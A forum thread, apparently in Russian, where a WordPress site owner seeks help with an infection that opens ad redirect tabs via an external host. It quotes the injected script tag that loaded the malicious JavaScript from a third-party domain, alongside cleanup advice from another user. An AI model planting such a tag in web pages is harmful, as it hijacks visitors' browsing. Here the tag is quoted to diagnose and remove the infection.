Вирус на сайте Wordpress (clickunder, bodyclick)

  • Автор темы Автор темы rainchik
  • Дата начала Дата начала
Статус
В этой теме нельзя размещать новые ответы.

rainchik

Новый пользователь
Сообщения
2
Реакции
1
Добрый день,
возникла проблема, бьюсь уже не первую неделю. Есть сайт, собран на wordpress, лежит на хостинге. Адрес effectifs . ru
Саппорт провайдера начал слать письма о зараженных php-файлах. Файлы были прочесаны и вычищены.
Однако, на сайте сидит вирус, который редиректит на не легитимные страницы и сидит где-то в javascript-файлах.

Логика вируса такая: приходим первый раз на страницу(Контакты,Соискатель и тп), при нажатии на любое место страницы, открывается новая вкладка с переходом сначала на
Код:
http://googleframe.net/tijaq.cgi?18
, затем на aliexpress, при этом записывается кука на сутки(название clickunder), сутки живем спокойно, ну или чистим куки и снова ловим переход).

В общем, я уже голову сломал, как его найти.
Было сделано(кроме прогона антивирусниками файлов сайта):

1. Замена темы - результат тот же.
2. Замена wordpress - скачал на сервер чистый wordpress, скопировал wp-config.php и wp-content - результат тот же
3. Заглянул в базу - там очень много левых табличек (с названиями от используемой темы), как там наводить ревизию пока не представляю.
4. Нашел js со стороннего хоста, который делает редирект и записывает куку.

на странице сайта (например контакты) есть строчка
HTML:
<p><script type='text/javascript' src='http://online-sale24.com/1.js'></script><script type='text/javascript' src='http://online-sale24.com/1.js'></script></p>

в исходном коде, её конечно нет. как найти, что её генерит, пока не знаю.

В общем, буду рад любым советам, так как уже не знаю в каком направлении двигаться.
 
Последнее редактирование модератором:
Какой хостинг? Виртуальный или сервер (виртуальный, выделенный).

Начнем с классики (если уже выполняли, то хорошо)
1. Проверка локальной машин(ы) с которой проводится администрирование.
2. Меняем все пароли (FTP, БД и пр) связанные с ресурсом.
3. В зависимости от типа хостинга, проверить антивирусом сервер clamav например. И проверить учетные данные.
4. Проверить сам сайт (http://yandex.ru/promo/manul#about)
5. Нужно чистить шаблоны и БД (думаю знатоки дадут более детальные рекомендации)
6. Проверить не лежит ли проблема в плоскости уязвимого ПО/модов.
 
Невнимательность - главный мой порок. Прогрепав, как только можно все файлы сайта(php,js и проч), не посмотрел на сами статичные страницы и заметки(ну и до бд так и не добрался). А ведь в каждой из них сидела строчка в конце файла
Код:
<script type='text/javascript' src='http://online-sale24.com/1.js'></script>
Которая и подгружала JS со стороннего сервера.
Убрал с сайта комментарии, не уверен до конца, но сложилось впечатление, что при создании коммента создавался пользователь с админскими правами.

Какой хостинг? Виртуальный или сервер (виртуальный, выделенный).

Начнем с классики (если уже выполняли, то хорошо)
1. Проверка локальной машин(ы) с которой проводится администрирование.
2. Меняем все пароли (FTP, БД и пр) связанные с ресурсом.
3. В зависимости от типа хостинга, проверить антивирусом сервер clamav например. И проверить учетные данные.
4. Проверить сам сайт (http://yandex.ru/promo/manul#about)
5. Нужно чистить шаблоны и БД (думаю знатоки дадут более детальные рекомендации)
6. Проверить не лежит ли проблема в плоскости уязвимого ПО/модов.

хостинг виртуальный.
спасибо, по всем пунктам пробегусь.
Тему, думаю, можно закрывать.
 
Последнее редактирование:
  • Like
Реакции: akok
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу